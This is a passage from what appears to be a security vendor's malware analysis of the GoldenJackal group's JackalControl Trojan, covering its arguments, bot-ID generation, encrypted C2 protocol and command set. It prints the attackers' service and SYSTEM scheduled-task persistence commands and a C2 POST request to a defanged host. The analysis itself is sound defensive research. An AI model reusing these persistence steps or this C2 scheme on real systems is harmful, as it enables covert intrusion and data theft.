class="crayon-num" data-line="crayon-67b40d9467989845621930-11">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-12">12</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-13">13</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-14">14</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-15">15</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-16">16</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-17">17</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-18">18</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-19">19</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-20">20</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-21">21</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467989845621930-1"><span class="crayon-sy">$</span><span class="crayon-i">temp</span><span class="crayon-sy">\</span><span class="crayon-sy">\</span><span class="crayon-i">dnf4</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span><span class="crayon-h"> </span>/<span class="crayon-i">q</span><span class="crayon-h"> </span>/<span class="crayon-e">norestart</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-2"><span class="crayon-e">tasklist</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-3"><span class="crayon-e">sc </span><span class="crayon-i">qc</span><span class="crayon-h"> </span><span class="crayon-s">"WEvMngS"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-4"><span class="crayon-e">sc </span><span class="crayon-i">stop</span><span class="crayon-h"> </span><span class="crayon-s">"WEvMngS"</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-5"><span class="crayon-e">sc </span><span class="crayon-i">delete</span><span class="crayon-h"> </span><span class="crayon-s">"WEvMngS"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-6"><span class="crayon-e">sc </span><span class="crayon-i">create</span><span class="crayon-h"> </span><span class="crayon-s">"WEvMngS"</span><span class="crayon-h"> </span><span class="crayon-i">binpath</span>=<span class="crayon-h"> </span><span class="crayon-s">"\"$windir\WEvMngS.exe\" /1"</span><span class="crayon-h"> </span><span class="crayon-i">displayname</span>=<span class="crayon-h"> </span><span class="crayon-s">"Windows</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-7"><span class="crayon-s">Event Manager"</span><span class="crayon-h"> </span><span class="crayon-i">type</span>=<span class="crayon-h"> </span><span class="crayon-e">own </span><span class="crayon-i">start</span>=<span class="crayon-h"> </span><span class="crayon-i">auto</span><span class="crayon-s">"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-8"><span class="crayon-s">sc description "</span><span class="crayon-i">WEvMngS</span><span class="crayon-s">" "</span><span class="crayon-e">Provides </span><span class="crayon-i">event</span>-<span class="crayon-e">related </span><span class="crayon-e">methods </span><span class="crayon-e">that </span><span class="crayon-e">register </span><span class="crayon-e">routed</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-9"><span class="crayon-i">events</span><span class="crayon-sy">.</span><span class="crayon-s">"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-10"><span class="crayon-s">sc start "</span><span class="crayon-i">WEvMngS</span><span class="crayon-s">"</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-11"><span class="crayon-s">schtasks /delete /f /tn "</span><span class="crayon-sy">\</span><span class="crayon-i">Microsoft</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">Diagnosis</span><span class="crayon-sy">\</span><span class="crayon-e">Event </span><span class="crayon-i">Manager</span><span class="crayon-s">"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-12"><span class="crayon-s">schtasks /create /f /tn "</span><span class="crayon-sy">\</span><span class="crayon-i">Microsoft</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">Diagnosis</span><span class="crayon-sy">\</span><span class="crayon-e">Event </span><span class="crayon-i">Manager</span><span class="crayon-s">" /xml</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-13"><span class="crayon-s">"</span><span class="crayon-sy">$</span><span class="crayon-i">temp</span><span class="crayon-sy">\</span><span class="crayon-sy">\</span><span class="crayon-i">sch</span><span class="crayon-sy">.</span><span class="crayon-i">xml</span><span class="crayon-s">" /ru "</span><span class="crayon-e">NT </span><span class="crayon-i">AUTHORITY</span><span class="crayon-sy">\</span><span class="crayon-i">SYSTEM</span><span class="crayon-s">"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-14"><span class="crayon-s">sc qc "</span><span class="crayon-i">WEvMngS</span><span class="crayon-s">"</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-15"><span class="crayon-s">schtasks /query /v /fo list /tn "</span><span class="crayon-sy">\</span><span class="crayon-i">Microsoft</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">Diagnosis</span><span class="crayon-sy">\</span><span class="crayon-e">Event </span><span class="crayon-i">Manager</span><span class="crayon-s">"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-16"><span class="crayon-s">tasklist</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-17"><span class="crayon-s">netstat -aon</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-18"><span class="crayon-s">ping -n 1 google.com</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-19"><span class="crayon-s">ipconfig /displaydns</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467989845621930-20"><span class="crayon-s">netsh winhttp show proxy</span></div><div class="crayon-line" id="crayon-67b40d9467989845621930-21"><span class="crayon-s">reg query "</span><span class="crayon-i">HKCU</span><span class="crayon-sy">\</span><span class="crayon-i">Software</span><span class="crayon-sy">\</span><span class="crayon-i">Microsoft</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">CurrentVersion</span><span class="crayon-sy">\</span><span class="crayon-e">Internet </span><span class="crayon-i">Settings</span>"<span class="crayon-h"> </span>/<span class="crayon-i">v</span></div></div></td> </tr> </table> </div> </div><p> <h2 id="jackalcontrol">JackalControl</h2> <p>This is a Trojan that allows the attackers to remotely control the target machine through a set of predefined and supported commands. These are received via an HTTPS communication channel facilitated between the malware and the C2 servers, and can instruct the implant to conduct any of the following operations:</p> <ul> <li>Execute an arbitrary program with provided arguments</li> <li>Download arbitrary files to the local file system</li> <li>Upload arbitrary files from the local file system</li> </ul> <p>During the last few years, the attackers updated this tool multiple times and we observed multiple variants. We are going to describe the latest version, which was observed in January 2023 (8C1070F188AE87FBA1148A3D791F2523).</p> <p>The Trojan is an executable file that can be started as a standard program or as a Windows service.</p> <p>It expects an argument, which can be equal to one of the following values:</p> <ul> <li>/0 : run as a standard program and contacts the C2 servers only once</li> <li>/1 : run as a standard program and contacts the C2 servers periodically</li> <li>/2 : run as a Windows service</li> </ul> <p>The malware arguments and the related malware behavior change according to the variants. Some variants offer only two arguments:</p> <ul> <li>/0 run as a standard program</li> <li>/1 run as a Windows service</li> </ul> <p>Other variants can install themselves with different persistence mechanisms. The malware&#8217;s execution flow is determined by the arguments provided in the command line with which it is run.</p> <ul> <li>/h0: will cause the malware to gain persistence by creating a Windows scheduled task.</li> <li>/h1: will cause the malware to gain persistence by creating a corresponding registry run key.</li> <li>/h2: will cause the malware to gain persistence by creating a Windows service.</li> <li>/r0: run as standard process (this argument is specified by the Windows scheduled task).</li> <li>/r1: run as standard process (this argument is specified by the generated registry run key value).</li> <li>/r2: run as a service (this argument is specified by the created Windows service).</li> </ul> <p>Over the years the attackers have distributed different variants: some include code to maintain persistence, others were configured to run without infecting the system; and the infection procedure is usually performed by other components, such as the batch script mentioned above.</p> <p>The malware starts its activities by generating a BOT_ID that is a unique value used to identify the compromised system. This value is derived from several other host-based values:</p> <p>The UUID value obtained from the following WMI query:</p> <div id="crayon-67b40d946798b001596442" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> select * from win32_computersystemproduct</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d946798b001596442-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d946798b001596442-1"><span class="crayon-e ">select *</span><span class="crayon-h"> </span><span class="crayon-e">from </span><span class="crayon-i">win32_computersystemproduct</span></div></div></td> </tr> </table> </div> </div><p> The machine GUID obtained from the following registry key:</p> <div id="crayon-67b40d946798d886101863" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> select * from win32_computersystemproduct</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d946798d886101863-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d946798d886101863-1"><span class="crayon-e ">select *</span><span class="crayon-h"> </span><span class="crayon-e">from </span><span class="crayon-i">win32_computersystemproduct</span></div></div></td> </tr> </table> </div> </div><p> The list of attached drives, obtained from another WMI query, which in turn allows them to determine the &#8216;SerialNumber&#8217; of &#8216;PHYSICALDRIVE0&#8217;:</p> <div id="crayon-67b40d946798e958403240" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> select * from win32_diskdrive</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d946798e958403240-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d946798e958403240-1"><span class="crayon-e ">select *</span><span class="crayon-h"> </span><span class="crayon-e">from </span><span class="crayon-i">win32_diskdrive</span></div></div></td> </tr> </table> </div> </div><p> The collected information is concatenated together in a byte array and then hashed with MD5, which is used as a seed for the creation of the BOT_ID. The algorithm used for the generation of the latter simply sums every two consecutive bytes from the resulting MD5 hash and places the resulting byte (modulus 256) as a single byte of the final BOT_ID. This logic is described in the code snippet below, taken from the malware.</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109712" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05.png" alt="Code snippet used to generate the BOT_ID" width="591" height="127" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05.png 591w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05-300x64.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16215704/GoldenJackal_APT_05-370x80.png 370w" sizes="auto, (max-width: 591px) 100vw, 591px" /></a></p> <p style="text-align: center"><strong><em>Code snippet used to generate the BOT_ID</em></strong></p> <p>The resulting BOT_ID is used also to initialize the DES key and IV, which are then used to encrypt communication with the C2.</p> <p>The malware communicates using HTTP POST requests where data arguments will be carried in encoded form as part of the request&#8217;s body. The overall request structure will then appear as follows:</p> <div id="crayon-67b40d946798f045958837" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-mixed-highlight" title="Contains Mixed Languages"></span><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> POST /wp-includes/class-wp-network-statistics.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: multipart/form-data; boundary=----2c0272b325864985abf2677460a9b07a Accept-Language: en-GB,en;q=0.5 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0, no-cache Pragma: no-cache Host: finasteridehair[.]com Content-Length: 154 Expect: 100-continue ------2c0272b325864985abf2677460a9b07a Content-Disposition: form-data; name="adv" %ENCODED_DATA% ------2c0272b325864985abf2677460a9b07a</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d946798f045958837-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-2">2</div><div class="crayon-num" data-line="crayon-67b40d946798f045958837-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-4">4</div><div class="crayon-num" data-line="crayon-67b40d946798f045958837-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-6">6</div><div class="crayon-num" data-line="crayon-67b40d946798f045958837-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-8">8</div><div class="crayon-num" data-line="crayon-67b40d946798f045958837-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-10">10</div><div class="crayon-num" data-line="crayon-67b40d946798f045958837-11">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-12">12</div><div class="crayon-num" data-line="crayon-67b40d946798f045958837-13">13</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-14">14</div><div class="crayon-num" data-line="crayon-67b40d946798f045958837-15">15</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-16">16</div><div class="crayon-num" data-line="crayon-67b40d946798f045958837-17">17</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946798f045958837-18">18</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d946798f045958837-1"><span class="crayon-i">POST</span><span class="crayon-h"> </span>/<span class="crayon-i">wp</span>-<span class="crayon-i">includes</span>/<span class="crayon-t">class</span>-<span class="crayon-i">wp</span>-<span class="crayon-i">network</span>-<span class="crayon-i">statistics</span><span class="crayon-sy">.</span><span class="crayon-e">php </span><span class="crayon-i">HTTP</span>/<span class="crayon-cn">1.1</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-2"><span class="crayon-i">User</span>-<span class="crayon-i">Agent</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">Mozilla</span>/<span class="crayon-cn">5.0</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-e">Windows </span><span class="crayon-i">NT</span><span class="crayon-h"> </span><span class="crayon-cn">6.1</span><span class="crayon-sy">;</span><span class="crayon-h"> </span><span class="crayon-i">Win64</span><span class="crayon-sy">;</span><span class="crayon-h"> </span><span class="crayon-i">x64</span><span class="crayon-sy">;</span><span class="crayon-h"> </span><span class="crayon-i">rv</span><span class="crayon-sy">:</span><span class="crayon-cn">68.0</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-i">Gecko</span>/<span class="crayon-cn">20100101</span></div><div class="crayon-line" id="crayon-67b40d946798f045958837-3"><span class="crayon-i">Firefox</span>/<span class="crayon-cn">68.0</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-4"><span class="crayon-i">Accept</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">text</span>/<span class="crayon-i">html</span><span class="crayon-sy">,</span><span class="crayon-i">application</span>/<span class="crayon-i">xhtml</span>+<span class="crayon-i">xml</span><span class="crayon-sy">,</span><span class="crayon-i">application</span>/<span class="crayon-i">xml</span><span class="crayon-sy">;</span><span class="crayon-i">q</span>=<span class="crayon-cn">0.9</span><span class="crayon-sy">,</span>*/*<span class="crayon-sy">;</span><span class="crayon-i">q</span>=<span class="crayon-cn">0.8</span></div><div class="crayon-line" id="crayon-67b40d946798f045958837-5"><span class="crayon-i">Content</span>-<span class="crayon-i">Type</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">multipart</span>/<span class="crayon-i">form</span>-<span class="crayon-i">data</span><span class="crayon-sy">;</span><span class="crayon-h"> </span><span class="crayon-i">boundary</span>=----<span class="crayon-cn">2c0272b325864985abf2677460a9b07a</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-6"><span class="crayon-i">Accept</span>-<span class="crayon-i">Language</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">en</span>-<span class="crayon-i">GB</span><span class="crayon-sy">,</span><span class="crayon-i">en</span><span class="crayon-sy">;</span><span class="crayon-i">q</span>=<span class="crayon-cn">0.5</span></div><div class="crayon-line" id="crayon-67b40d946798f045958837-7"><span class="crayon-i">Upgrade</span>-<span class="crayon-i">Insecure</span>-<span class="crayon-i">Requests</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-cn">1</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-8"><span class="crayon-i">Cache</span>-<span class="crayon-i">Control</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">max</span>-<span class="crayon-i">age</span>=<span class="crayon-cn">0</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">no</span>-<span class="crayon-e">cache</span></div><div class="crayon-line" id="crayon-67b40d946798f045958837-9"><span class="crayon-i">Pragma</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">no</span>-<span class="crayon-e">cache</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-10"><span class="crayon-i">Host</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">finasteridehair</span><span class="crayon-sy">[</span><span class="crayon-sy">.</span><span class="crayon-sy">]</span><span class="crayon-e">com</span></div><div class="crayon-line" id="crayon-67b40d946798f045958837-11"><span class="crayon-i">Content</span>-<span class="crayon-i">Length</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-cn">154</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-12"><span class="crayon-i">Expect</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-cn">100</span>-<span class="crayon-st">continue</span></div><div class="crayon-line" id="crayon-67b40d946798f045958837-13">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-14">------<span class="crayon-cn">2c0272b325864985abf2677460a9b07a</span></div><div class="crayon-line" id="crayon-67b40d946798f045958837-15"><span class="crayon-i">Content</span>-<span class="crayon-i">Disposition</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">form</span>-<span class="crayon-i">data</span><span class="crayon-sy">;</span><span class="crayon-h"> </span><span class="crayon-i">name</span>=<span class="crayon-s">"adv"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-16"><span class="crayon-ta">%</span><span class="crayon-i">ENCODED_DATA</span><span class="crayon-sy">%</span></div><div class="crayon-line" id="crayon-67b40d946798f045958837-17">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946798f045958837-18">------<span class="crayon-cn">2c0272b325864985abf2677460a9b07a</span></div></div></td> </tr> </table> </div> </div><p> A valid response should in turn be formed in the following way:</p> <div id="crayon-67b40d9467991903875404" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; float: none; margin-left: auto; margin-right: auto; clear: none; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> &lt;!-- DEBUGDATA::%ENCODED_DATA% --&gt;</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467991903875404-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467991903875404-1"><span class="crayon-h">&lt;</span><span class="crayon-sy">!</span>--<span class="crayon-h"> </span><span class="crayon-i">DEBUGDATA</span><span class="crayon-sy">:</span><span class="crayon-sy">:</span><span class="crayon-sy">%</span><span class="crayon-i">ENCODED_DATA</span><span class="crayon-sy">%</span><span class="crayon-h"> </span>--<span class="crayon-h">&gt;</span></div></div></td> </tr> </table> </div> </div><p> The response is decoded with base64: the resulting payload is an array of strings, where the used delimiter is the standard Windows new line sequence – &#8220;\r\n&#8221;. Each line is decoded again with base64, decrypted with DES, and decompressed with the GZIP algorithm.</p> <p>Each command has the following structure:</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220013/GoldenJackal_APT_06.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109713" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220013/GoldenJackal_APT_06.png" alt="Command structure" width="799" height="63" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220013/GoldenJackal_APT_06.png 799w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220013/GoldenJackal_APT_06-300x24.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220013/GoldenJackal_APT_06-768x61.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220013/GoldenJackal_APT_06-370x29.png 370w" sizes="auto, (max-width: 799px) 100vw, 799px" /></a></p> <p style="text-align: center"><strong><em>Command structure</em></strong></p> <p>The command type must be equal to one of the following codes:</p> <table width="100%"> <tbody> <tr> <td style="background-color: #d9d9d9;text-align: center" width="25%"><strong>Command</strong></td> <td style="background-color: #d9d9d9;text-align: center" width="75%"><strong>Description</strong></td> </tr> <tr> <td style="padding-left: 10px">00</td> <td>Execute &#8211; Execute an arbitrary program with the specified arguments. If the attacker sets the NoWait flag to False, the malware redirects the process output, reads the data and forwards them to the C2.</td> </tr> <tr> <td style="padding-left: 10px">01</td> <td>Download &#8211; Read a file from the local system and upload it to the server.</td> </tr> <tr> <td style="padding-left: 10px">02</td> <td>Upload &#8211; Save received data to the local system using the filepath specified by the attacker.</td> </tr> </tbody> </table> <p>The Command Data field is intended to carry information on the command arguments and has a different structure for each action type, as specified below:</p> <ul> <li><strong>Execute</strong><br /> <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220318/GoldenJackal_APT_07.png" class="magnificImage"><img decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220318/GoldenJackal_APT_07.png" alt="" width="100%" /></a></li> <li><strong>Download</strong><br /> <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220338/GoldenJackal_APT_08.png" class="magnificImage"><img decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220338/GoldenJackal_APT_08.png" alt="" width="100%" /></a></li> <li><strong>Upload</strong><br /> <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220355/GoldenJackal_APT_09.png" class="magnificImage"><img decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16220355/GoldenJackal_APT_09.png" alt="" width="100%" /></a></li> </ul> <p>The command results are usually composed into a message that also includes the values of the underlying command type and command ID, which uniquely identifies an instance of a command issued to the malware. The three values are compressed with GZIP, encrypted with DES, and encoded with base64.</p> <p>The resulting payload is concatenated with the BOT_ID using the &#8220;|&#8221; char, encoded again with base64, after which it gets uploaded to the remote server using the aforementioned POST request 